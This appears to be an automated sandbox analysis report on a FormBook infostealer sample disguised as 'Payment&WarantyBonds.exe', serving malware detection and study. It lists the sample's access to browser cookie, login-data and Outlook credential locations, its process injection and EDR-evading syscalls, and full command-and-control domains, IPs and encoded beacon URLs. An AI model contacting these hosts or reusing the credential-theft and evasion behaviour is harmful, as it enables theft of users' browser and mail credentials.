                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.Payment&WarantyBonds.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Payment&WarantyBonds.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2021577870.0000000001740000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4106735496.0000000004570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4105782211.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2020861134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4108148789.0000000004A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4106690765.0000000004520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4106710053.00000000041D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2022730147.00000000031C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\systeminfo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\systeminfo.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.Payment&WarantyBonds.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Payment&WarantyBonds.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2021577870.0000000001740000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4106735496.0000000004570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4105782211.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2020861134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4108148789.0000000004A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4106690765.0000000004520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4106710053.00000000041D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2022730147.00000000031C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading                		412
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		121
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                Abuse Elevation Control Mechanism                		1
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets2
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain Credentials114
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                DLL Side-Loading                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1545791 Sample: Payment&WarantyBonds.bat Startdate: 31/10/2024 Architecture: WINDOWS Score: 100 31 www.xipowerplay.xyz 2->31 33 www.091210.xyz 2->33 35 17 other IPs or domains 2->35 45 Suricata IDS alerts for network traffic 2->45 47 Multi AV Scanner detection for submitted file 2->47 49 Yara detected FormBook 2->49 53 5 other signatures 2->53 10 Payment&WarantyBonds.exe 3 2->10         started        signatures3 51 Performs DNS queries to domains with low reputation 33->51 process4 file5 29 C:\Users\...\Payment&WarantyBonds.exe.log, ASCII 10->29 dropped 65 Injects a PE file into a foreign processes 10->65 14 Payment&WarantyBonds.exe 10->14         started        signatures6 process7 signatures8 67 Maps a DLL or memory area into another process 14->67 17 lVlYtqLlYCJP.exe 14->17 injected process9 signatures10 43 Found direct / indirect Syscall (likely to bypass EDR) 17->43 20 systeminfo.exe 13 17->20         started        process11 signatures12 55 Tries to steal Mail credentials (via file / registry access) 20->55 57 Tries to harvest and steal browser information (history, passwords, etc) 20->57 59 Modifies the context of a thread in another process (thread injection) 20->59 61 3 other signatures 20->61 23 lVlYtqLlYCJP.exe 20->23 injected 27 firefox.exe 20->27         started        process13 dnsIp14 37 www.cotti.club 103.120.80.111, 49778, 49793, 49809 WEST263GO-HKWest263InternationalLimitedHK Hong Kong 23->37 39 www.simplek.top 203.161.49.193, 50036, 50037, 50038 VNPT-AS-VNVNPTCorpVN Malaysia 23->39 41 12 other IPs or domains 23->41 63 Found direct / indirect Syscall (likely to bypass EDR) 23->63 signatures15

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                Payment&WarantyBonds.exe46%ReversingLabsWin32.Trojan.Leonem
                Payment&WarantyBonds.exe40%VirustotalBrowse
                Payment&WarantyBonds.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                http://www.fontbureau.com/designersG0%URL Reputationsafe
                https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                http://www.fontbureau.com/designers/?0%URL Reputationsafe
                http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                http://www.fontbureau.com/designers?0%URL Reputationsafe
                http://www.tiro.com0%URL Reputationsafe
                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                http://www.fontbureau.com/designers0%URL Reputationsafe
                http://www.goodfont.co.kr0%URL Reputationsafe
                http://www.sajatypeworks.com0%URL Reputationsafe
                http://www.typography.netD0%URL Reputationsafe
                http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                http://www.fonts.com0%URL Reputationsafe
                http://www.sandoll.co.kr0%URL Reputationsafe
                http://www.urwpp.deDPlease0%URL Reputationsafe
                http://www.zhongyicts.com.cn0%URL Reputationsafe
                http://www.sakkal.com0%URL Reputationsafe
                http://www.fontbureau.com0%URL Reputationsafe
                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                https://www.ecosia.org/newtab/0%URL Reputationsafe
                http://www.carterandcone.coml0%URL Reputationsafe
                https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                http://www.fontbureau.com/designers/cabarga.htmlN0%URL Reputationsafe
                http://www.founder.com.cn/cn0%URL Reputationsafe
                http://www.fontbureau.com/designers/frere-user.html0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                http://www.fontbureau.com/designers80%URL Reputationsafe
                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.cotti.club
                		103.120.80.111
                		truetrue
                  		unknown
                  www.sgland06.online
                  		34.92.128.59
                  		truefalse
                    		unknown
                    solarand.online
                    		217.160.0.60
                    		truetrue
                      		unknown
                      www.simplek.top
                      		203.161.49.193
                      		truetrue
                        		unknown
                        extrime1.shop
                        		152.42.255.48
                        		truetrue
                          		unknown
                          www.cesach.net
                          		217.76.156.252
                          		truetrue
                            		unknown
                            basicreviews.online
                            		144.76.190.39
                            		truetrue
                              		unknown
                              www.091210.xyz
                              		172.67.154.67
                              		truetrue
                                		unknown
                                www.adsa6c.top
                                		20.2.249.7
                                		truetrue
                                  		unknown
                                  www.297676.com
                                  		199.59.243.227
                                  		truetrue
                                    		unknown
                                    www.xipowerplay.xyz
                                    		13.248.169.48
                                    		truetrue
                                      		unknown
                                      www.030002059.xyz
                                      		161.97.142.144
                                      		truetrue
                                        		unknown
                                        iampinky.info
                                        		3.33.130.190
                                        		truetrue
                                          		unknown
                                          stationseek.online
                                          		198.251.84.200
                                          		truetrue
                                            		unknown
                                            www.solarand.online
                                            		unknown
                                            		unknownfalse
                                              		unknown
                                              www.extrime1.shop
                                              		unknown
                                              		unknownfalse
                                                		unknown
                                                www.stationseek.online
                                                		unknown
                                                		unknownfalse
                                                  		unknown
                                                  www.iampinky.info
                                                  		unknown
                                                  		unknownfalse
                                                    		unknown
                                                    www.basicreviews.online
                                                    		unknown
                                                    		unknownfalse
                                                      		unknown

                                                      Contacted URLs

                                                      NameMaliciousAntivirus DetectionReputation
                                                      http://www.cotti.club/3ej6/?78=Gf4n60vPMxeL0A+d5GBWdueSYaV7AAF6sYlT7O2otcMNGwtil4ITBlU9iT/EVO+vtwlhWFB1C/mfTw8URcWhMQgTObTwj1m/ib0JAzzbicsZX3cTLGstzzo=&hrOd=1DzdIBZXhZaHw2Wptrue
                                                        		unknown
                                                        http://www.091210.xyz/jwed/?hrOd=1DzdIBZXhZaHw2Wp&78=BP+RnxL4kRmCbJis2H94uci3abF0xOX/uWRdW7IS0nQn3eBqrLGhokpRAgB0njlljCrnZN3jlOJi4UAaeIXlep/T+OgRPR3ifAipJWCHkORcjZ0KtUFfU2c=true
                                                          		unknown
                                                          http://www.297676.com/xyex/?78=GRv8gXQeeb2Gl8ts68dy26JEIDOFTPQDU1Y3CPEivIL54q3aRuVfXNser16Tn8T/OBl4IICKxXKXWQiZ2Uzn7HwRtVNzQ2FbKXtno3vR39Y/zqEhWKkV0ww=&hrOd=1DzdIBZXhZaHw2Wptrue
                                                            		unknown
                                                            http://www.extrime1.shop/jr4j/true
                                                              		unknown
                                                              http://www.xipowerplay.xyz/akxn/true
                                                                		unknown
                                                                http://www.xipowerplay.xyz/akxn/?hrOd=1DzdIBZXhZaHw2Wp&78=bVCpbCQOZK8RJSSOpbtjW6178FykoGhXFODVqYypnT+nS+pakzyDZ3G2gJzbbKB5bmDBooJSbxoFgw5n88RQ4gN+spy4B3V2SPR8yfMM1NLM4EIxe0ofqks=true
                                                                  		unknown
